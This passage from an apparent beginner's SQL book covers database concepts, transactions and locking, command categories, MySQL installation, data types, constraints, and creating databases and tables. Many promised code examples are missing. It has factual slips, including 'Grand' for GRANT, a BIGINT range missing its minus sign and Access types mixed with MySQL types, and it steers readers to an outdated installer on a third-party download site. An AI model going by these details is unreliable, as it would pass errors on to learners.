able to find what you need the most without making a mess or wasting time.
Relational databases
First, we need to take a look at the relational databases. This database is the
one that you will want to use when you want to work with databases that are
aggregated into logical units or other types of tables, and then these tables
have the ability to be interconnected inside of your database in a way that will
make sense depending on what you are looking for at the time. These
databases can also be good to use if you want to take in some complex
information, and then get the program to break it down into some smaller
pieces so that you can manage it a little bit better.
The relational databases are good ones to work with because they allow you
to grab on to all the information that you have stored for your business, and
then manipulate it in a way that makes it easier to use. You can take that
complex information and then break it up into a way that you and others are
more likely to understand. While you might be confused by all the
information and how to break it all up, the system would be able to go
through this and sort it the way that you need in no time. You are also able to
get some more security so that if you place personal information about the
customer into that database, you can keep it away from others, in other
words, it will be kept completely safe from people who would want to steal
it.
Client and server technology
In the past, if you were working with a computer for your business, you were
most likely using a mainframe computer. What this means is that the
machines were able to hold onto a large system, and this system would be
good at storing all the information that you need and for processing options.
Now, these systems were able to work, and they got the job done for a very
long time. If your company uses these and this is what you are most
comfortable with using, it does get the work done. But there are some options
on the market that will do a better job. These options can be found in the
client-server system.
These systems will use some different processes to help you to get the results
that are needed. With this one, the main computer that you are using, which
would be called the ‘server,’ will be accessible to any user who is on the
network. Now, these users must have the right credentials to do this, which
helps to keep the system safe and secure. But if the user has the right
information and is on your network, they can reach the information without a
lot of trouble and barely any effort. The user can get the server from other
servers or from their desktop computer, and the user will then be known as
the ‘client’ so that the client and server are easily able to interact through this
database.

How to work with databases that are online


There are a lot of business owners who will find that the client and server
technology is the one that works for them. This system is great for many
companies, but there are some things that you will need to add or take away
at times because of how technology has been changing lately. There are some
companies that like the idea that their database will do better with the internet
so that they can work on this database anywhere they are located, whether
they are at home or at the office. There are even times when a customer will
have an account with the company, and they will need to be able to access the
database online as well. For example, if you have an account with Amazon,
you are a part of their database, and you can gain access to certain parts
through this.
As the trend continues for companies to move online, it is more common to
see that databases are moving online as well and that you must have a
website and a good web browser so that the customer can come in and check
them out. You can always add in usernames and passwords to make it more
secure and to ensure that only the right user can gain access to their
information. This is a great idea to help protect personal and payment
information of your customers. Most companies will require that their users
pick out security credentials to get on the account, but they will offer the
account for free.
Of course, this is a system that is pretty easy to work with, but there will be a
number of things going on behind the scenes to make sure that the program
will work properly. The customer can simply go onto the system and check
the information with ease, but there will be a lot of work for the server to do
to make sure that the information is showing up on the screen in the right
way, and to ensure that the user will have a good experience and actually see
their own account information on the screen.
For example, you may be able to see that the web browser that you are using
uses SQL or a program that is similar to it, to figure out the user that your
data is hoping to see.
Why is SQL so great?
Now that we have spent some time talking about the various types of
database management systems that you can work with, it is time to discuss
why you would want to choose SQL over some of the other options that are
out there. You not only have the option of working with other databases but
also with other coding languages, and there are benefits to choosing each one.
So, why would you want to work with SQL in particular? Some of the great
benefits that you can get from using SQL as your database management
system includes:
Incredibly fast
If you would like to pick out a management system that can sort through the
information quickly and will get the results back in no time, then SQL is one
of the best programs to use for this. Just give it a try, and you will be
surprised at how much information you can get back, and how quickly it will
come back to you. In fact, out of all the options, this is the most efficient one
that you can go with.
Well defined standards
The database that comes with SQL is one that has been working well for a
long time. In addition, it has been able to develop some good standards that
ensure the database is strong and works the way that you want. Some of the
other databases that you may want to work with will miss out on these
standards, and this can be frustrating when you use them.

You do not need a lot of coding


If you are looking into the SQL database, you do not need to be an expert in
coding to get the work done. We will take a look at a few codes that can help,
but even a beginner will get these down and do well when working in SQL.
Keeps your stuff organized
When it comes to running your business, it is important that you can keep
your information safe and secure as well as organized. And while there are a
ton of great databases that you can go with, none will work as well as the
SQL language at getting this all done.
Object-oriented DBMS
The database of SQL relies on the DBMS system that we talked about earlier
because this will make it easier to find the information that you are searching
for, to store the right items, and do so much more within the database.
These are just a few of the benefits that you can get when you choose to work
with the SQL program. While some people do struggle with this interface in
the beginning, but overall there are a ton of good features to work on with
SQL, and you will really enjoy how fast and easy it is to work with this
language and its database.
You may believe that SQL is an incomplete programming language. If you
want to use SQL in an application, you must combine SQL with another
procedural language like FORTRAN, Pascal, C, Visual Basic, C++, COBOL,
or Java. SQL has some strengths and weaknesses because of how the
language is structured. A procedural language that is structured differently
will have different strengths and weaknesses. When you combine the two
languages, you can overcome the weaknesses of both SQL and the procedural
language.
You can build a powerful application when you combine SQL and a
procedural language. This application will have a wide range of capabilities.
We use an asterisk to indicate that we want to include all the columns in the
table. If this table has many columns, you can save a lot of time by typing an
asterisk. Do not use an asterisk when you are writing a program in a
procedural language. Once you have written the application, you may want to
add or delete a column from the table when it is no longer necessary. When
you do this, you change the meaning of the asterisk. If you use the asterisk in
the application, it may retrieve columns which it thinks it is getting.
This change will not affect the existing program until you need to recompile
it to make some change or fix a bug. The effect of the asterisk wildcard will
then expand to current columns. The application could stop working if it
cannot identify the bug during the debugging process. Therefore, when you
build an application, refer to the column names explicitly in the application
and avoid using the asterisk.
Since the replacement of paper files stored in a physical file cabinet,
relational databases have given way to new ground. Relational database
management systems, or RDBMS for short, are used anywhere information is
stored or retrieved, like a login account for a website or articles on a blog.
Speaking of which, this also gave a new platform to and helped leverage
websites like Wikipedia, Facebook, Amazon, and eBay. Wikipedia, for
instance, contains articles, links, and images, all of which are stored in a
database behind-the-scene. Facebook holds much of the same type of
information, and Amazon holds product information and payment methods,
and even handles payment transactions.
With that in mind, banks also use databases for payment transactions and to
manage the funds within someone’s bank account. Other industries, like
retail, use databases to store product information, inventory, sales
transactions, price, and so much more. Medical offices use databases to store
patient information, prescription medication, appointments, and other
information.
To expand further, using the medical office for instance, a database gives
permission for numerous users to connect to it at once and interact with its
information. Since it uses a network to manage connections, virtually anyone
with access to the database can access it from just about anywhere in the
world.
These types of databases have also given way to new jobs and have even
expanded the tasks and responsibilities of current jobs. Those who are in
finance, for instance, now have the ability to run reports on financial data;
those in sales can run reports for sales forecasts, and so much more!
In practical situations, databases are often used by multiple users at the same
time. A database that can support many users at once has a high level of
concurrency. In some situations, concurrency can lead to loss of data or the
reading of non-existent data. SQL manages these situations by using
transactions to control atomicity, consistency, isolation, and durability. These
elements comprise the properties of transactions. A transaction is a sequence
of T-SQL statements that combine logically and complete an operation that
would otherwise introduce inconsistency to a database. Atomicity is a
property that acts as a container for transaction statements. If the statement is
successful, then the total transaction completes. If any part of a transaction is
unable to process fully, then the entire operation fails, and all partial changes
roll back to a prior state. Transactions take place once a row, or a page-wide
lock is in place. Locking prevents modification of data from other users
taking effect on the locked object. It is akin to reserving a spot within the
database to make changes. If another user attempts to change data under lock,
their process will fail, and an alert communicates that the object in question is
barred and unavailable for modification. Transforming data using
transactions allows a database to move from one consistent state to a new
consistent state. It's critical to understand that transactions can modify more
than one database at a time. Changing data in a primary key or foreign key
field without simultaneously updating the other location, creates inconsistent
data that SQL does not accept. Transactions are a big part of changing related
data from multiple table sources all at once. Transactional transformation
reinforces isolation, a property that prevents concurrent transactions from
interfering with each other. If two simultaneous transactions take place at the
same time, only one of them will be successful. Transactions are invisible
until they are complete. Whichever transaction completes first will be
accepted. The new information displays upon completion of the failed
transaction, and at that point, the user must decide if the updated information
still requires modification. If there happened to be a power outage and the
stability of the system fails, data durability would ensure that the effects of
incomplete transactions rollback. If one transaction completes and another
concurrent transaction fails to finish, the completed transaction is retained.
Rollbacks are accomplished by the database engine using the transaction log
to identify the previous state of data and match the data to an earlier point in
time.
There are a few variations of a database lock, and various properties of locks
as well. Lock properties include mode, granularity, and duration. The easiest
to define is duration, which specifies a time interval where the lock is
applied. Lock modes define different types of locking, and these modes are
determined based on the type of resource being locked. A shared lock allows
the data reads while the row or page lock is in effect. Exclusive locks are for
performing data manipulation (DML), and they provide exclusive use of a
row or page for the execution of data modification. Exclusive locks do not
take place concurrently, as data is being actively modified; the page is then
inaccessible to all other users regardless of permissions. Update locks are
placed on a single object and allow for the data reads while the update lock is
in place. They also allow the database engine to determine if an exclusive
lock is necessary once a transaction that modifies an object is committed.
This is only true if no other locks are active on the object in question at the
time of the update lock. The update lock is the best of both worlds, allowing
reading of data and DML transactions to take place at the same time until the
actual update is committed to the row or table. These lock types describe
page-level locking, but there are other types beyond the scope of this
text. The final property of a lock, the granularity, specifies to what degree a
resource is unavailable. Rows are the smallest object available for locking,
leaving the rest of the database available for manipulations. Pages, indexes,
tables, extents, or the entire database are candidates for locking. An extent is
a physical allocation of data, and the database engine will employ this lock if
a table or index grows and more disk space is needed. Problems can arise
from locks, such as lock escalation or deadlock, and we highly encourage
readers to pursue a deeper understanding of how these function.
It is useful to mention that Oracle developed an extension for SQL that
allows for procedural instruction using SQL syntax. This is called PL/SQL,
SQL on its own is unable to provide procedural instruction because it is a
non-procedural language. The extension changes this and expands the
capabilities of SQL. PL/SQL code is used to create and modify advanced
SQL concepts such as functions, stored procedures, and triggers. Triggers
allow SQL to perform specific operations when conditional instructions are
defined. They are an advanced functionality of SQL, and often work in
conjunction with logging or alerts to notify principals or administrators when
errors occur. SQL lacks control structures, the for looping, branching, and
decision making, which are available in programming languages such as
Java. The Oracle corporation developed PL/SQL to meet the needs of their
database product, which includes similar functionality to other database
management systems, but is not limited to non-procedural
operations. Previously, user-defined functions were mentioned but not
defined. T-SQL does not adequately cover the creation of user-defined
functions, but using programming, it is possible to create functions that fit
neatly within the same scope as system-defined functions. A user-defined
function (UDF) is a programming construct that accepts parameters, performs
tasks capable of making use of system defined parameters, and returns results
successfully. UDFs are tricky because Microsoft SQL allows for stored
procedures that often can accomplish the same task as a user-defined
function. Stored procedures are a batch of SQL statements that are executed
in multiple ways and contain centralized data access logic. Both of these
features are important when working with SQL in production environments.
Chapter 3 Some of the Basic Commands We Need
to Know

Now, before we are able to get too far into some of the codings that we are
able to do with this kind of language, one of the first things that we need to
learn a bit more about is some of the basic commands that come with this
language, and how each of them is going to work. You will find that when
you know some of the commands that come with any language, but
especially with the SQL language, it will ensure that everything within the
database is going to work the way that you would like.
As we go through this, you will find that the commands in SQL, just like the
commands in any other language, are going to vary. Some are going to be
easier to work with and some are going to be more of a challenge. But all of
them are going to come into use when you would like to create some of your
own queries and more in this language as well so it is worth our time to learn
how this works.
When it comes to learning some of the basic commands that are available in
SQL, you will be able to divide them into six categories and these are all
going to be based on what you will be able to use them for within the system.
Below are the six different categories of commands that you can use inside of
SQL and they include the following.
Data Definition Language
The data definition language, or DDL, is an aspect inside of SQL that will
allow you to generate objects in the database before arranging them the way
that you would like. For example, you will be able to use this aspect of the
system in order to add or delete objects in the database table. Some of the
commands that you will be able to use with the DDL category include:

Drop table
Create a table
Alter table
Create an index
Alter index
Drop index
Drop view
Data Manipulation Language
The idea of a DML, or data manipulation language, is one of the aspects of
SQL that you will be able to use to help modify a bit of the information that
is out there about objects that are inside of your database. This is going to
make it so much easier to delete the objects, update the objects, or even to
allow for something new to be inserted inside of the database that you are
working with. You will find that this is one of the best ways to make sure that
you add in some freedom to the work that you are doing, and will ensure that
you are able to change up the information that is already there rather than
adding to something new.
Data Query Language
Along with the same kinds of lines and thoughts here are the DQL or the data
query language. This one is going to be kind of fun to work with because it is
going to be one of the most powerful of the aspects that you are able to do
with the SQL language you have. This is going to be even truer when you
work with a modern database to help you get the work done.
When we work with this one, we will find that there is only really one
command that we are able to choose from, and this is going to be the
SELECT command. You are able to use this command to make sure that all
of your queries are ran in the right way within your relational database. But if
you want to ensure that you are getting results that are more detailed, it is
possible to go through and add in some options or a special clause along with
the SELECT command to make this easier.
Data Control Language
The DCL or the data control language is going to be a command that you are
able to use when you would like to ensure you are maintaining some of the
control that you need over the database, and when you would like to limit
who is allowed to access that particular database, or parts of the database, at a
given time. You will also find that the DCL idea is going to be used in a few
situations to help generate the objects of the database related to who is going
to have the necessary access to see the information that is found on that
database.
This could include those who will have the right to distribute the necessary
privileges of access when it comes to this data. This can be a good thing in
order to use your business is dealing with a lot of sensitive information and
you only want a few people to get ahold of it all the time. Some of the
different commands that you may find useful to use when working with the
DCL commands are going to include:

Revoke
Create synonym
Alter password
Grand
Data Administration Commands
When you choose to work with these commands, you will be able to analyze
and also audit the operation that is in the database. In some instances, you
will be able to assess the overall performance with the help of these
commands. This is what makes these good commands to choose when you
want to fix some of the bugs that are on the system and you want to get rid of
them so that the database will continue to work properly. Some of the most
common commands that are used for this type include:
Start audit
Stop audit
One thing to keep in mind with the database administration and the data
administration are basically different things when you are on SQL. The
database administration is going to be in charge of managing all of the
databases, including the commands that you set out in SQL. This one is also a
bit more specific to implementing SQL as well.

Transactional Control Commands


The final type of command that we are going to take a look at is going to be
the transactional control commands. These are going to be some good
commands that you are able to work within SQL if you would like to have
the ability to keep track of as well as manage some of the different
transactions that are going to show up in the database that you are working
with.
If you sell some products online for your website, for example, you will need
to work with the transactional control commands to help keep track of the
different options that the user is going to look for, to keep track of the profits,
and to help you to manage this kind of website so that you know what is
going on with it all of the time. there are a few options that you are able to
work with when it comes to these transactional control commands, and a few
of the most important ones that we need to spend our time on will include:

Commit—this one is going to save all the information that you


have about the transactions inside the database.

Savepoint—this is going to generate different points inside the


groups of transactions. You should use this along with the
Rollback command.
Rollback—this is the command that you will use if you want
to go through the database and undo one or more of the
transactions.
Set transaction—this is the command that will assign names
to the transactions in your database. You can use it to help add
in some organization to your database system.
All of the commands that we have spent some time discussing in this chapter
are going to be important to some of the work that we want to get done and
will ensure that we are going to find the specific results that we need out of
our database. We will be able to spend some time looking through them in
this book, but this can be a good introduction to show us what they mean, and
how we will be able to use them for some of our needs later on.
Chapter 4 Installing and configuring MySql on
your system
If you already have MySql server installed on your server then you can skip
this section.
Here, I am going to provide you the steps required to install MySQL 8.0 on
Windows computer. Here is the link to the software
https://dev.mysql.com/downloads/mysql/8.0.html. If you are not using
Windows then under the heading “MySQL Community Server 8.0.18” you
will see the “Select Operating System:” dropbox. Select your Operating
system and you will be provided with all the options.
If you are learning on a standalone system and you are a beginner, I would
recommend you to install Windows Essentials from https://mysql-
essential.en.uptodown.com/windows.
While looking for information on MySql you will come across terms like
MySQl community server, MySql installer and MySql essentials. As the
name suggests Essentials provides just what is essential without any
additional components and ideal to start learning. Both installer and
community server have full server features, but the community server is only
installed online. For the installer, you have to download the package and then
install it offline.
Back to MySql Essential. Once you click the download button, the installer
package can be found in the downloads folder by the name of “mysql-
essential-6.0.0.msi”. Follow the steps given below for installing the software.

1. Double click on the mysql-essential-6.0.0.msi package to start


the installation process. You would see a MySQL Server 6.0 –
Setup Wizard Window. To continue with the installation
process click on “Next button”.
2. You will now have to select the Setup Type. Setup can be one
of three types:
1. Typical for general use
2. Complete for installation of all program features
3. Custom to select which programs you want to install.
You can go ahead with Typical installation. If you want to change the path
where the software is installed then you will have to opt for
custom installation.

3. For this book, I went with custom installation because I


wanted to change the path of installation. Click Next.
4. The next screen will prompt you to login or create a MySQL
account. Signing up is not mandatory. You can create an
account or click on the “Skip Sign-Up” radio button and click
the Next button.
5. You have reached the last screen of the installation process.
Before pressing the Finish button ensure that the “Configure
the MySQL Server now” check box is clicked.
We now move on to configuration of MySQL. After clicking the “Finish”
button, you will be presented with “MySQL Server Instance Configuration
Wizard”. If the window does not pop up on its own, click the Start button on
the desktop. Look for the Wizard and click on it. Click “Next” on the first
screen. Now follow the steps given below:

1. You must first select whether you want to go for detailed or


standard configuration. Select “Detailed Configuration”.
2. Next, you have to select the server type. Your selection will
influence memory, disk and CPU usage. Go for Server if you
are planning to work on a server that is hosting other
applications. Click Next.
3. If you have selected Server in the above step, you will be
presented a screen where you are asked to set a path for
InnoDBdatafile to enable InnoDB database engine. Without
making any modifications click on Next.
4. On this screen, you will have to set approximate number of
concurrent connections directed to the server. Ideally, for
general purpose usage, it is best to go with the first option.
Click Next after making your selection.
5. On the next screen, you are presented with two options: (1) Set
the TCP/IP Networking to enabled and (2) Enable Strict Mode.
Check the “Enable TCP/IP Networking” option. The second
option “Enable Strict Mode” will be checked by default. Most
applications do not prefer this option, so if you do not have a
good reason for using it in Strict mode, uncheck this option and
click the Next button.
6. You will now be asked to set the default character set used by
MySQL. Select “Standard Character Set” and click on Next.
7. On this step, you must set window options. You will see three
check boxes : “Install as Windows Service”, “Launch the
MySQL Server automatically” and “Include Bin Directory in
Windows PATH” . Check all three boxes and click Next.
8. You will now have to set the root password for the account.
Check “Modify Security Settings” and provide your password
details. If your server is on the internet then avoid checking
“Enable root access from remote machines”. Also, it is not
recommended to check the “Create An Anonymous Account”
option. Please save the password at a safe place.
9. This window will show you how the configuration is
processing. Once the processing is over, the “Finish” button
will be enabled and you can click on it.
Congratulations!! You have successfully installed and configured MySQL on
your machine. It is time for action now.
Chapter 5 Data Types
There are various types of data that can be stored in databases. Listed below
are some of the data types that can be found and used in a database:
• Byte- allows numbers from the range of 0-255 to be contained. Storage is 1
byte.
• Currency- this holds 15 whole dollar digits with additional decimal places
up to 4. Storage is 8 bytes.
• Date/Time- will be used for dates and times. Storage is 8 bytes.
• Double- This is a double precision floating-point which will handle most
decimals. Storage is 8 bytes.
• Integer- This will allow of the amounts between -32,768 and
32,767. Storage is 2 bytes.
• Text- This is used for combinations of texts and numbers. This can up to
255 characters to be stored.
• Memo- This can be used for text of larger amounts. It can store 65,536
characters. Memo fields can’t be sorted but they can be searched.
• Long- This will allow between -2,147,483, 648 and 2,147,483,647 whole
numbers. Storage is 4 bytes.
• Single- This is a single precision floating-point that will handle most
decimals. Storage is 4 bytes.
• AutoNumber- This field can automatically give each record of data its own
number which usually starts out at 1. Storage is 4 bytes.
• Yes/No- This is a logical field that can be displayed as yes/no, true/false, or
on/off. The use of true and false should be equivalent to -1 and 0. In these
fields, null values are not allowed. Storage is 1 bit.
• Ole Object- This can store BLOBS such as pictures, audio, video. BLOBs
are which Binary Large Objects. The storage is 1 gigabyte (GB).
• Hyperlink- This contains links to other files like web pages.
• Lookup Wizard- This will let you make an options list. A drop down list
will then allow it to be chosen. Storage is 4 bytes.
Overall, data types can be categorized into three different types of data. They
are either
1. Character types
2. Number types
3. Date/Time types
Character types consist of text. Number types contain amounts or numbers.
Date/Time types consist of a recorded date or time. Listed below are some of
the types of data of each category.
Character Data Types
• CHAR(size)- A fixed length string can be held with this data type. It is able
to hold special characters, letters and numbers. This can store up to 255
characters.
• VARCHAR(size)- This can hold a variable string length which is able to
hold special characters, letters and numbers. The size will be specified in
parenthesis. It can store up to 255 characters. This will automatically be a text
type that it is converted to if the value is placed higher than 255 characters.
• TINYTEXT- This holds a string with 255 characters of maximum length.
• TEXT- This holds a string with 65,535 characters of maximum length.
• MEDIUMTEXT- This holds a string with 16,777,215 of maximum
characters.
• LONGTEXT- This holds a string with 4,294,967,295 of maximum
characters.
• BLOB- These hold 65,535 bytes of maximum data.
• MEDIUMBLOB- These hold 16,777,215 bytes of maximum data.
• LONGBLOB- These hold 4,294,967,295 bytes of maximum data.
• ENUM(x,y,z, etc.)- A list that contains possible values. This list can
hold 65535 max values. When a value is entered into the list that isn’t
contained inside that list, a blank value will be entered instead. The order that
the values are entered is how they will also be sorted.
• SET- This is similar to the ENUM data type. This data type holds a
maximum of 64 list items and is able to store more than one choice.
Number Data Types
The most common of the options are listed below along with their storage
type when it comes to bytes and values:
• TINYINT(size)- Holds -128 to 127, or 0 to 255 unsigned.
• SMALLINT(size)- Holds -32768 to 32767, or 0 to 65535 unsigned.
• MEDIUMINT(size)- Holds -8388608 to 8388607, or 16,777,215 unsigned.
• INT(size)- Holds -2,147,483,648 to 2,147,483,647, or 4,294,967,295
unsigned.
• BIGINT(size)- Holds 9,223,372,036,854,775,808 to
9,223,372,036,854,775,807 or
18,446,744,073,709,551,615 unsigned.
• FLOAT(size,d)- This is a tiny number with a decimal point that can float.
Specified in the size parameter is the maximum amount of digits. Specified in
the d parameter is the maximum amount of digits in the right of the decimal
point.
• DOUBLE(size,d)- This is a large number with a decimal point that
floats. The maximum number of digits may be specified in the size parameter
(size). The maximum number of digits to the right of the decimal point is
specified in the d parameter (d).
• DECIMAL(size,d)- This type is string that is stored which allows a decimal
point that is fixed. The maximum number of digits may be specified in the
size parameter (size). Specified in the d parameter is the maximum amount of
digits to the right of the decimal point.
An extra option is found in integer types that is called unsigned. Normally, an
integer will go from a value of negative to positive. When adding the
unsigned attribute will be able to move the range up higher so that it will not
start at a negative number, but a zero. That is why the unsigned option is
mentioned after the specified numbers listed for the different data types.
Date/Time Data Types
The options for date are:
• DATE()- This is in order to enter a date in the format of YYYY-MM-DD as
in 2016-04-19 (April 19th, 2016)
• DATETIME()- This is in order to enter a combination of date and time in
the format of YYYY-MM-DD and HH:MM:SS as in 13:30:26 (1:30 p.m. at
26 seconds)
• TIMESTAMP()- This is in order to enter to store the number of seconds and
match the current time zone. The format is YYYY-MM-DD HH:MM:SS.
• TIME()- This will allow you to enter the time. The format is HH:MM:SS.
• YEAR()- This is in order to enter a year in a two or four digit format. A
four-digit format would be as 2016 or 1992. A two digit format would be as
72 or 13.
It is important to note that if the DATETIME and TIMESTAMP will
return to the same format. When compared to each other, they will still work
in different ways. The TIMESTAMP will automatically update to the current
time and date of the time zone present TIMESTAMP will also accept other
various formats available such as YYYYMMDDHHMMSS,
YYMMDDHHMMSS, YYYYMMDD, and also
YYMMDD.
Chapter 6 SQL Constraints
Constraints refer to the rules or restrictions that will be applied on a table or
its columns. These rules are applied to ensure that only specific data types
can be used on a table. The use of constraints helps ensure the accuracy and
reliability of data.
You can specify constraints on a table or column level. When constraints are
specified on a column level, they are only applicable to a specific column.
When they are defined on a table basis, they are implemented on the entire
table.
SQL offers several types of constraints. Following are the most commonly
used ones:
PRIMARY Key
FOREIGN Key
UNIQUE Key
INDEX
NOT NULL
CHECK Constraint
DEFAULT Constraint
PRIMARY Key
A Primary Key is a unique value which is used to identify a row or record.
There is only one primary key for each table but it may consist of multiple
fields. A column that had been designated as a primary key can’t contain
NULL values. In general, a primary key is designated during the table
creation stage.
Creating a Primary Key
The following statement creates a table named Employees and designates the
ID field as its primary key:
You may also specify a primary key constraint later using the ALTER
TABLE statement. Here’s the code for adding a primary constraint to the
EMPLOYEES table:

Deleting Primary Key Constraint


To remove the primary key constraint from a table, you will use the ALTER
TABLE with the DROP statement. You may use this statement:

FOREIGN Key
A foreign key constraint is used to associate a table with another table. Also
known as referencing key, the foreign key is commonly used when you’re
working on parent and child tables. In this type of table relationship, a key in
the child table points to a primary key in the parent table.
A foreign key may consist of one or several columns containing values that
match the primary key in another table. It is commonly used to ensure
referential integrity within the database.

The diagram below will demonstrate the parent-child table relationship:

The EMPLOYEES_TBL is the parent table. It contains important information


about employees and uses the field emp_id as its primary key to identify each
employee. The EMPLOYEES_SALARY_TBL contains information about
employees’ salary, position, and other details.
It is logical to assume that all salary data are associated with a specific
employee entered in the EMPLOYEES_TBL. You can enforce this logic by
adding a foreign key on the EMPLOYEES_SALARY_TBL and setting it to
point to the primary key of the EMPLOYEES_TBL. This will ensure that the
data for each employee in the EMPLOYEES_SALARY_TBL are referenced
to the specific employee listed in the EMPLOYEES_TBL. Consequently, it
will also prevent the EMPLOYEES_SALARY table from storing data for
names that are not included in the EMPLOYEES table.
To demonstrate how to set up the foreign key constraint, create a table named
EMPLOYEE with the following statement:

The EMPLOYEE table will serve as the parent table.


Next, create a child table that will refer to the EMPLOYEES table:

Notice that the ID column in the EMPLOYEE_SALARY TABLE references


the ID column in the EMPLOYEE table.
At this point, you may want to see the structure of the
EMPLOYEE_SALARY TABLE. You can use the DESC command to do
this:
DESC EMPLOYEE_SALARY;
The FOREIGN KEY constraint is typically specified during table creation but
you can still add a foreign key to existing tables by modifying the table. For
this purpose, you will use the ALTER TABLE command.
For example, to add a foreign key constraint to the EMPLOYEE_SALARY
table, you will use this statement:

Removing FOREIGN KEY constraint


To drop a FOREIGN KEY constraint, you will use this simple syntax:

NOT NULL
A column contains NULL VALUES by default. To prevent NULL values
from populating the table’s column, you can implement a NOT NULL
constraint on the column. Bear in mind that the word NULL pertains to
unknown data and not zero data.
To illustrate, the following code creates the table STUDENTS and defines six
columns:

Notice the NOT NULL modifier on the columns ID, LAST_NAME,


FIRST_NAME, and AGE. This means that these columns will not accept
NULL values.
If you want to modify a column that takes a NULL value to one that does not
accept NULL values, you can do so with the ALTER TABLE statement. For
instance, if you want to enforce a NOT NULL constraint on the column
LOCATION, here’s the code:
UNIQUE Key
A UNIQUE key constraint is used to ensure that all column values are
unique. Enforcing this constraint prevents two or more rows from holding the
same values in a particular column. For example, you can apply this
constraint if you don’t want two or more students to have the same
LAST_NAME in the STUDENTS table. Here’s the code:

You can also use the ALTER TABLE statement to add a UNIQUE constraint
to an existing table. Here’s the code:

You may also add constraint to more than one column by using ALTER
TABLE with ADD CONSTRAINT:

Removing a UNIQUE constraint


To remove the myUniqueConstraint, you will use the ALTER TABLE with
the DROP statement. Here’s the syntax:

DEFAULT Constraint
The DEFAULT constraint is used to provide a default value whenever the
user fails to enter a value for a column during an INSERT INTO operation.
To demonstrate, the following code will create a table named EMPLOYEES
with five columns. Notice that the SALARY column takes a default value
(4000.00) which will be used if no value was provided when you add new
records:

You may also use the ALTER STATEMENT to add a DEFAULT constraint
to an existing table:

Removing a Default Constraint


To remove a DEFAULT constraint, you will use the ALTER TABLE with
the DROP statement:

CHECK Constraint
A CHECK constraint is used to ensure that each value entered in a column
satisfies a given condition. An attempt to enter a non-matching data will
result to a violation of the CHECK constraint which will cause the data to be
rejected.
For example, the code below will create a table named GAMERS with five
columns. It will place a CHECK constraint on the AGE column to ensure that
there will be no gamers under 13 years old on the table.

You can also use the ALTER TABLE statement with MODIFY to add the
CHECK constraint to an existing table:
INDEX Constraint
The INDEX constraint lets you build and access information quickly from a
database. You can easily create an index with one or more table columns.
After the INDEX is created, SQL assigns a ROWID to each row prior to
sorting. Proper indexing can enhance the performance and efficiency of large
databases.
Here’s the syntax:

For instance, if you need to search for a group of employees from a specific
location in the EMPLOYEES table, you can create an INDEX on the column
LOCATION.
Here’s the code:

Removing the INDEX Constraint


To remove the INDEX constraint, you will use the ALTER TABLE
statement with DROP.
Chapter 7 Databases
In this chapter, I will talk about different database-related operations. You
need to learn these operations as part of learning SQL. The operations that I
am talking about here are how to create a data base, how to select a database,
and finally how, if need be, you can drop a data base from your SQL Server. I
will teach you how to do these operations with queries and with the help of
the graphical user interface of SQL Server.
So, let’s start with creating a data base. Start your SQL Server and connect to
the SQL instance that you have created while setting up SQL Server. Click
on the new Query option available on the “Standard” toolbar available under
the main menu. After you click on the new query button, a window will open
up, and you will see a text editor on your screen. On the text editor, write the
following query:
Create database Employee;
Click on the Execute button that has an exclamation mark in red color. After
execution, you will see a message stating that your command ran
successfully. Now, to see the newly created database, go to the left side of
you screen, where a navigation panel is present. Look for a folder that says
‘databases’ and expand it. You will now see the list of databases present in
the current instance of SQL.
Now, let’s look at a way you can create a database by using the navigation
panel. Right Click on the database folder, and then select ‘new database
option’. Once you do that, a new window will open up. Use this window to
pass on the name of your database, and click on the “Ok” button. If all things
go well, you will now have a new database. You can go to the navigation
panel and look through the list of databases available for your newly created
database.
To select your newly created database, you can use the following SQL
statement before writing the rest of your SQL query:
Use Employee;
The aforementioned statement ensures that your query will be executed on
the database you explicitly mentioned. You can select you desired database
using the SQL Server’s GUI. Near the new query option, there is a drop-
down list that contains names of all the databases present in the current
instance of SQL. Go on and select your database from the said drop-down
list.
Now that we have talked about how we can create and select a database in
SQL Server, let’s move on and see how you can safely delete or drop a
database. When you perform a drop operation on a database, the database
gets deleted permanently from the SQL Server’s instance. I will drop the
Employee’s database that I created for this tutorial. This database doesn’t
contain any data so far, but that doesn’t concern the drop SQL statement.
Here’s the query to drop the database:
Example:
Drop Database Employee;
If all things go well, you will see the following message as an output in the
messages window.
Output:
Command(s) completed successfully.
So now, let’s see how you can drop a database using the SQL Server’s
graphical user interface. Right click on the name of any database that you
want to delete (make sure you have created a test database for this exercise).
After you right click on the name of a database, you will see the delete
option; click on it. A new window will open up; make sure you check the box
that says close existing connections available at the bottom of the window.
Closing existing connections allows you to safely delete your databases. With
queries, this happens automatically, but when you delete your database using
the GUI, you need to select this option so that if some project is using this
database, the connection to that project will be closed before the drop option
goes on. That’s all you need to know about databases at this point of your
learning curve.
Chapter 8 Tables
Tables are data structures that hold some sort of data. In SQL, tables are often
referred to as relations too. The reason behind tables being called relations is
that relationships like one to one, one to many, and many to many exist
between tables. I will talk about these relations and what they mean in a later
part of this book, so let’s just focus here on tables. In this chapter, I will teach
you guys how you can create, alter, and delete/drop a table. I will also give
you a peek into how you can select data from a single table in this chapter.
We will talk about complex select queries later on in this book, so don’t
worry.
So, let’s start with creating a table. In order to create a table, you must have a
database which will hold all your tables and their data. I took the liberty and
set an Employee database in my SQL Server. Go on, create Employee
database.
I am assuming that you have successfully created a database. Write the
following query in the new query text editor:
Example:
Use Employee;
CREATE TABLE Employee (
StafID INT NOT NULL,
StafName VARCHAR (20) NOT NULL,
StafAGE INT NOT NULL,
StafADDRESS CHAR (25),
StafSALARY DECIMAL (18, 2),
PRIMARY KEY (StafID)
);
Output:
Command(s) completed successfully.
The example above contains an SQL query that will use the Employee
database and will create a table inside this database. The name of that table
will be Employee as you can see the second line of the query. StafID,
StafName, StafAGE, StafADDRESS and StafSALARY are
columns/attributes of this table. Right next to the name of columns, the
datatype of each column is mentioned. The NOT NULL specifier tells SQL
Server that this column can’t hold NULL values. That means that you have to
pass a value for the non-null able columns if you are trying to insert data into
this table.
PRIMARY KEY (StafID)
The line above says the StafID column will be used as a primary key column.
Primary keys have some properties i.e. the primary key column should hold
unique values, and each primary key value is related to an entire tuple or
record in an SQL table.
Now that we have created a table, let’s insert some data into it. I will use the
Employee database to add details about different employees using the
employee table. The query to insert data in a table looks like the following
example:
Example:
Insert into Employee
(StafID,StafName,StafAGE,StafADDRESS,StafSALARY)
Values(1,'John','23','America', '5000');
Insert into Employee
(StafID,StafName,StafAGE,StafADDRESS,StafSALARY)
Values(2,'Mike','32','Africa', '4000');
Insert into Employee
